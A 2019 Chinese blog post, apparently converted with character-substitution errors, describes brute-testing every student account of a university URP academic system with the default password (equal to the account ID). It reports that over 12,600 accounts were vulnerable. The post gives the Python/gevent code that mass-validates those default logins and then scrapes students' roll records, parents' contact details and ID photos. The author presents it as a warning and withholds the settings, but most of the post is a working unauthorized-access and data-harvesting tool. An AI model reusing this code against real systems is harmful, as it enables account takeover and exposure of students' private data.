你的我的信息正暴露在互联网中！Python 爬虫获取 URP 教务系统学籍信息

时间 2019-11-22

标签我的信息暴露互联网中 python 爬虫获取 urp 教务系统学籍栏目 Python 繁體版

原文原文链接

原创文章，转载务必注明原文连接！

初衷

本文旨在提醒同窗们及时修改密码，加强保护我的隐私的意识，所以代码中一些关键数据以及校名等信息不会公开！复制粘贴文章中的代码不会爬到任何东西。只是做为学习 Python 爬虫的一点总结而已！html

做者所在学校的教务系统安全防范措施可谓很是不严密，学生登陆甚至不须要图形验证码。每一年学生入学以后，学校下发的帐号，初始密码不是无规律的，而是和帐号彻底一致！若是学生不及时修改密码，那么其余人能够轻松登陆他的帐号。登陆后能够看到学生的学籍信息，包括高考报名时照片，家长联系方式等，联系地址甚至详细到几单元几楼几号门，我的信息泄露状况很是严重！python

结果

先说结果。通过两天连写带调试，终于完成了对全校本科生 17400 多个在网帐号的测试，其中有 12600 多个帐号使用的仍是初始密码。此处隐去校名，统计结果以下：git

序号	学院	年级	在网帐号	可爬帐号	年级占比
1	本一	2014	3157	1998	63.29%
2	本一	2015	3328	2234	67.13%
3	本一	2016	3641	3066	84.21%
4	本一	2017	3497	3326	95.11%
5	本三	2014	1759	303	17.23%
6	本三	2015	1643	620	37.74%
7	本三	2016	1605	1434	89.35%
8	本三	2017	1552	639	41.17%

介于初衷，只爬了 10 个帐号的信息，以示严重性！github

过程

本人以前作过近 2 年的 Java 相关开发，对 HTTP 协议中经常使用的知识了解一些，再加上 Python 出了名的简洁易用，所以入门仍是比较轻松的。去年有一段时间研究过一阵子 Python，使用的是 Scrapy 框架，因此这一次我也首先想到了 Scrapy。浏览器

Scrapy 这种框架适用的情形是：已经获取了须要爬取的页面的一系列 URL ，或者 URL 是成必定规律变化的，不须要登陆或者登陆一次拿到 Cookie 就能够拿着这个 Cookie 一直用了。可是教务系统彻底相反，它须要每次都进行登陆，也许 Scrapy 有办法，但也不会太简单，索性本身写。安全

这套教务系统虽然安全性不怎么样，但也已经是一套成熟的产品了，功能和稳定性上仍是很不错的。服务器

首先使用 Firefox 浏览器的开发者工具查看 HTTP 通讯的一些信息：cookie

登陆表单经过 POST 请求进行提交，参数是帐号和密码，发送的也是明文app

服务器返回的响应中 Set-Cookie 就至关于给用户下发的令牌，用户下一次请求的时候带上这块令牌，服务器就能认出来这个用户是否刚登陆过。这个令牌是有时间限制的，每次请求都会刷新一次时间，若是两次请求之间间隔时间超过设定值，那么服务器就不认识用户了，此次会话就结束了，须要从新登陆。框架

刚开始使用的是 requests ，用 for 循环实现，因为 requests 是同步的，因此效率很低，还会常常卡死。后来改为了协程，用的 gevent + urllib3，效率提高了上百倍。解析 HTML 用的 lxml 的 etree，图片的保存用 PIL 的 Image。

先引入依赖

import sys
import logging
import gevent
import urllib3
import pathlib
from PIL import Image
from io import BytesIO
from lxml import etree
复制代码

建立 HTTP 链接池

http = urllib3.HTTPConnectionPool(
	host=settings.SERVER_HOST,
	port=settings.SERVER_PORT,
	strict=False,
	maxsize=100,
	block=False,
	retries=100,
	timeout=10
)
复制代码

请求头的一些固定信息能够预先设定好，假装浏览器

header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Accept-Encoding': 'gzip, deflate',
	'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
	'Cache-Control': 'max-age=0',
	'Connection': 'Keep-alive',
	'Host': settings.SERVER_HOST,
	'Upgrade-Insecure-Requests': '1',
	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
}
复制代码

登陆并验证是不是初始密码

# 帐号校验器
class InfoValidate(object):
	def __init__(self):
		self.logger = InfoMain.logger
		self.http = InfoMain.http
		# 有效帐号
		self.account_valid = []
		# 可爬帐号
		self.account_available = []

	def validate(self, all_account):
		# 将全部校验过程加入队列
		jobs = [gevent.spawn(self.validate_account, self.http, a) for a in all_account]
		gevent.joinall(jobs, timeout=0)

	def validate_account(self, http, account):
		# 登陆请求参数
		param = {"zjh": account, "mm": account}
		header = headers.header
		response = http.request('POST', settings.URL_LOGIN, fields=param, headers=header)
		self.logger.info('发送请求>>{}'.format(param))
		self.logger.info(response.status)
		# 响应体解码
		res_text = response.data.decode('GB2312', 'ignore')

		if res_text.find('密码不正确') > -1:
			# 密码有误
			self.account_valid.append(account)
		elif not res_text.find('证件号不存在') > -1:
			# 帐号可爬
			self.account_available.append(account)
			self.account_valid.append(account)
			self.logger.info("帐号可用>>>{}".format(account))
复制代码

至此已经获取了全部初始密码未修改的帐号了，下面研究一下，要爬取的学籍信息页的规律

一系列的信息都包裹在 <td width = "275"></td>之间，对应的 xpath 表达式即为 //td[starts-with(@width,"275")]/text()

基于以前对帐号的测试，爬取学籍信息

# 信息收集器
class InfoCollect(object):
	def __init__(self):
		self.logger = InfoMain.logger
		self.http = InfoMain.http
		# 功能模块
		self.mod_get_roll_info = settings.MOD_ROLL_INFO
		self.mod_get_roll_img = settings.MOD_ROLL_IMG

	def get_info_queue(self, accounts):
		# 将全部信息收集过程加入队列
		jobs = [gevent.spawn(self.get_info, a) for a in accounts]
		gevent.joinall(jobs, timeout=0)

	def get_info(self, stuid):
		# 登陆
		param = {'zjh': stuid, 'mm': stuid}
		response = self.http.request('POST', settings.URL_LOGIN, fields=param)
		# 保存 Cookie
		cookie = response.headers['Set-Cookie'].replace('; path=/', '')
		header = headers.header
		header['cookie'] = cookie
		# 学籍信息
		if self.mod_get_roll_info:
			# 带 Cookie 访问学籍信息页
			response_xjxx = self.http.request('GET', settings.URL_XJXX, headers=header)
			text = response_xjxx.data.decode('GB2312', 'ignore')
			# 解析页面内容
			selector = etree.HTML(text)
			text_arr = selector.xpath('//td[starts-with(@width,"275")]/text()')
			# 学籍信息
			result = []
			for info in text_arr:
				result.append(info.strip())
			self.save_info(result)
		# 学籍照片
		if self.mod_get_roll_img:
			response_xjzp = self.http.request('GET', settings.URL_XJZP, headers=header)
			image = Image.open(BytesIO(response_xjzp.data))
			setpath = settings.PATH_IMG_SAVE
			path = pathlib.Path(setpath)
			if not path.exists():
				path.mkdir()
			setpath = setpath + '/' + stuid + '.jpg'
			image.save(setpath)
			self.logger.info('保存照片>>>{}'.format(setpath))

		# 登出
		self.http.request('POST', settings.URL_LOGOUT, headers=header)
复制代码

至此，已经实现了全部信息的获取以及照片的保存。

没改密码的同窗们应该看到了，获取我的信息其实很简单，关键在于加强本身保护我的信息的意识。

相关开源项目：URP_Spider github.com/JamesZBL/UR…